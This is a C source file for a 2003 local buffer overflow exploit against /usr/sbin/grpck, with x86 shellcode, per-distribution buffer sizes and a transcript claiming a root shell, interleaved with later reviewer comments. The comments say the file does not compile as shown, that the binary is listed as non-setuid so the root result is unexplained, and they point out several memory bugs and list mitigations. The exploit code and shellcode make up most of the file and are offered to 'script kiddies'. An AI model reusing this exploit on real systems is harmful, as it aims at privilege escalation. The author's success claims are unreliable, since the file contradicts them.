/**** xgrpck.c /usr/sbin/grpck local buffer overflow exploit * **** when you've run xgrpck.c compiled, you'll have euid=0 in system **** could you send me please your opinion by e-mail or irc. :) * **** Users; * **** h4x0r & Script Kiddies & Lamers & Newbies for local buffer overflow exploit * **** Warning ! Warning ! Warning ! Warning ! Warning !Warning !Warning !Warning **** Warning ! Warning ! Warning ! Warning ! Warning !Warning !Warning !Warning **** Warning ! Warning ! Warning ! Warning ! Warning !Warning !Warning !Warning **** **** -sh-2.05b$ ls -la /usr/sbin/grpck **** -rwxr-xr-x 1 root root 22316 Aug 28 2001 /usr/sbin/grpck **** file is not suid +s mod /usr/sbin/grpck * * Vuln Sys ; * **** ******* Gentoo Linux *** * *** none Tested **** ******* SlackwareLinux *** * *** none Tested **** Testing RedHat Linux 7.3 & 8.0 r0073d **** Testing Cobalt Linux 6.x & 7.x r0073d **** Testing Mandrake Linux 8.1 & 8.2 r0073d **** Testing Debian Linux 2.1 & 2.2 r0073d **** Testing RedHat Linux 6.x all version none root **** Testing SuSE Linux x.x all version none root * **** Target buffers ; * **** RedHat 7.3 & 8.0 : 2517 **** Cobalt 6.x & 7.x : 2197 **** Mandrake 8.1 & 8.2 : 2391 **** Debian 2.1 & 2.2 : 2887 / u are change target buffer **** **** Usage ; * **** sh-2.05b$ /usr/sbin/grpck `perl -e '{print"1337"x2520}'` **** Segmentation fault (core dumped) **** sh-2.05b$ gcc -o xgrpck xgrpck.c **** sh-2.05b$ ./xgrpck **** xgrpck.c /usr/sbin/grpck local buffer overflow exploit **** manowaR@DALnet www.rsf.gen.tr Rammstein@secureroot.com * **** w00w0w0000 ! 
very nice a Day :-D **** Buffer: 2520 **** sh-2.05b# **** sh-2.05b# uname -a **** Linux localhost 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 GNU/Linux **** sh-2.05b# cat /etc/redhat-release **** Red Hat Linux release 8.0 (Psyche) **** sh-2.05b# id **** uid=513(scan) gid=513 euid=0(root) groups=1(staff) * * manowaR@DALnet www.rsf.gen.tr e-mail : Rammstein@secureroot.com * * 10 December 2003 05:13 * Greetz: xmax , irc.ulak.net #root my Channel & my Brothers :PcKiLLeR - Avicenna - Pink-cashmere etc ... * */

/*
 * Reviewer notes on this 2003 proof-of-concept:
 *
 *  - The header names after the four `#include` directives were lost when
 *    this page was extracted; as shown, the file does not compile.
 *  - The file header itself lists /usr/sbin/grpck as -rwxr-xr-x, i.e. not
 *    setuid.  A stack overflow in a non-setuid binary runs with the
 *    invoker's own privileges, so the euid=0 shown in the transcript is not
 *    explained by anything on this page.
 *  - The fill value 0xbfffe5bc and the get_sp() result are absolute stack
 *    addresses; they presuppose a non-randomized 32-bit stack.
 *  - Mitigations that defeat this class of attack wholesale: stack canaries
 *    (-fstack-protector), non-executable stack (NX), ASLR, and keeping
 *    administrative tools non-setuid.
 */
#include
#include
#include
#include

/* sh33lc0d3 by xmax@EFnet*/
/*
 * Payload bytes, reproduced unchanged.  The leading stub patches bytes of
 * the trailing string in place before use (the repeated \x80\x46\xNN\x30
 * sequence), so the literal array does not contain the string it ends up
 * passing to the kernel -- a static signature on the array alone may miss
 * it; confirm by disassembly.  The \xcd\x80 bytes are `int 0x80`, i.e. the
 * 32-bit x86 Linux system-call interface.  No byte in the array is zero.
 */
char sh33lc0d3[] =
"\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80\x46\x03\x30"
"\x80\x46\x05\x30\x80\x46\x06\x30\x89\xf0\x89\x46\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff"
"\x2f\x32\x39\x3e\x2f\x43\x38";

/*
 * Return the current stack pointer.  There is no C `return` statement: the
 * value is whatever the inline `movl %esp, %eax` left in %eax, which is
 * undefined behaviour in C and only works on 32-bit x86 with a compiler
 * that happens not to touch %eax before the function returns.
 */
unsigned long get_sp(void) {
    __asm__("movl %esp, %eax");
}

/*
 * Build an oversized argv[1] and exec /usr/sbin/grpck with it.
 *
 * Returns 0 only if execl() fails (a successful exec never returns); the
 * failure is not reported to the user.
 */
int main(int argc, char **argv) {
    int bsize = 2517; /* buffer size for Redhat Linux; see "Target buffers" in the file header for other distributions */
    unsigned long addr;
    char *buff;
    int i;

    /* Round bsize up to the next multiple of 6. */
    if (bsize % 6 != 0) {
        bsize = bsize + 6 - (bsize % 6);
    }
    buff = (char *)malloc(bsize); /* result is never checked for NULL */
    addr = get_sp();
    system("clear"); /* spawns a shell via system(); resolves `clear` through PATH */
    fprintf(stderr, "xgrpck.c /usr/sbin/grpck local buffer overflow exploit\n");
    /* The next two format strings contain no conversion specifier, so the
     * extra `addr` argument is simply ignored. */
    fprintf(stderr, "manowaR@DALnet www.rsf.gen.tr Rammstein@secureroot.com\n\n", addr);
    fprintf(stderr, "w00w0w0000 ! very nice a Day :-D \n", addr);
    fprintf(stderr, "Buffer: %d\n", bsize);
    /* Store a fixed `long` at every byte offset.  Each store is sizeof(long)
     * bytes wide, so the last sizeof(long)-1 iterations write past the end
     * of the malloc'd block (a heap overflow in this program itself); the
     * stores are also unaligned and violate strict aliasing. */
    for(i = 0; i < bsize; i++) {
        *(long *)&buff[i] = 0xbfffe5bc;
    }
    *(long *)&buff[bsize - 6] = addr;
    memcpy(buff + bsize - strlen(sh33lc0d3) - 8, sh33lc0d3, strlen(sh33lc0d3));
    /* buff is never NUL-terminated: neither the fill pattern nor the payload
     * contains a zero byte, so unless `addr` does, execl() reads argv[1]
     * past the allocation until it happens to find one. */
    execl("/usr/sbin/grpck", "grpck", buff, NULL);
    return 0;
}
/* manowaR */